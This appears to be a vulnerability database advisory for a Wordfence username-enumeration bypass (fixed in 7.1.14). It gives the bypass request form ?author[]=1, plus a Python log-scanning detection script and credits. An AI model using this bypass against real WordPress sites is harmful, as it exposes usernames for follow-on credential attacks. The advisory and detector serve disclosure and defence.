Wordfence <= 7.1.12 - Username Enumeration Prevention Bypass



Proof of Concept
Wordfence blocks:

http://www.example.com/?author=1

But allows:

http://www.example.com/?author[]=1
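
A detection check covering both request forms shown above, as an added example that is not part of the original advisory or of Wordfence's code: it scans access-log lines for a numeric `author` parameter in scalar or PHP array-bracket form, and goes slightly beyond the two URLs above by also matching the percent-encoded `author%5B%5D` spelling. The log lines are constructed samples, and the function names `author_probe` and `scan` are hypothetical.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Oct/2018:10:00:01 +0000] "GET /?author=1 HTTP/1.1" 301 0',
    '203.0.113.5 - - [02/Oct/2018:10:00:02 +0000] "GET /?author[]=1 HTTP/1.1" 301 0',
    '203.0.113.5 - - [02/Oct/2018:10:00:03 +0000] "GET /?author%5B%5D=2 HTTP/1.1" 301 0',
    '198.51.100.7 - - [02/Oct/2018:10:00:04 +0000] "GET /?s=author HTTP/1.1" 200 512',
    '198.51.100.7 - - [02/Oct/2018:10:00:05 +0000] "GET /?coauthor[]=1 HTTP/1.1" 200 512',
]

# Request line inside a combined-format log entry.
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[0-9.]+"')
# "author" optionally followed by PHP array brackets: author[], author[0], author[a][b].
AUTHOR_KEY_RE = re.compile(r"author(\[[^\]]*\])*")
NUMERIC_RE = re.compile(r"[0-9]+")


def author_probe(request_target):
    """Return 'scalar' or 'array' when the query carries a numeric author ID, else None."""
    query = request_target.partition("?")[2].partition("#")[0]
    # parse_qsl percent-decodes keys, so author%5B%5D is seen as author[].
    for key, value in parse_qsl(query, keep_blank_values=True):
        if AUTHOR_KEY_RE.fullmatch(key) and NUMERIC_RE.fullmatch(value):
            return "array" if "[" in key else "scalar"
    return None


def scan(lines):
    """Return (client_ip, request_target, form) for every author-ID request found."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match is None:
            continue
        form = author_probe(match.group(1))
        if form is not None:
            hits.append((line.split()[0], match.group(1), form))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A rule that compares the parameter name only against the literal string `author` reports the first sample line and misses the next two; matching the name with its optional brackets after decoding catches all three.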

Affects Plugin

Fixed in version 7.1.14

References

PACKETSTORM 149845
URL http://www.waraxe.us/advisory-109.html

Classification

Type BYPASS

Miscellaneous

Original Researcher Janek Vind "waraxe"
Submitter Ryan Dewhurst
Submitter Website https://dewhurstsecurity.com/
Submitter Twitter ethicalhack3r
Verified Yes
WPVDB ID 9135

Timeline

Publicly Published 2018-10-02 (about 2 months ago)
Added 2018-10-18 (about 1 month ago)
Last Updated 2018-10-18 (about 1 month ago)
